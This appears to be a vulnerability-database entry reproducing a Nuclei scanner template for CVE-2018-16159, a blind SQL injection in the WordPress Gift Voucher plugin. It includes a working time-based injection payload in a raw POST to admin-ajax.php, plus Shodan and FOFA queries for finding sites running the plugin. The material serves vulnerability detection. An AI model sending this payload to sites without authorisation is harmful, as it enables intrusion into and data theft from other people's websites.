Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16159
HistoryMar 05, 2023 - 1:42 p.m.

WordPress Gift Voucher <4.1.8 - Blind SQL Injection

2023-03-0513:42:10
ProjectDiscovery
github.com
5
cve2018
sql-injection
wordpress
unauthorized-access
plugin
codemenschen

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.01 Low

EPSS

Percentile

84.0%

WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2018-16159

info:
  name: WordPress Gift Voucher <4.1.8 - Blind SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
  remediation: Fixed in version 4.1.8.
  reference:
    - https://wpscan.com/vulnerability/9117
    - https://wordpress.org/plugins/gift-voucher/
    - https://www.exploit-db.com/exploits/45255/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16159
    - https://wpvulndb.com/vulnerabilities/9117
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16159
    cwe-id: CWE-89
    epss-score: 0.01228
    epss-percentile: 0.85084
    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: codemenschen
    product: gift_vouchers
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
    fofa-query: body="/wp-content/plugins/gift-voucher/"
  tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=wpgv_doajax_front_template&template_id=1 and sleep(6)#

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "images") && contains(body, "title")'
        condition: and
# digest: 490a00463044022039c62ea7189c856952f0a35cfb1c5bcc09fd83a4aae6a766e8357ce6c29625e202204b8b8f1561357042ae671f4d7d5166f074ce46d7d8586fb02316afdd260df3bd:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.01 Low

EPSS

Percentile

84.0%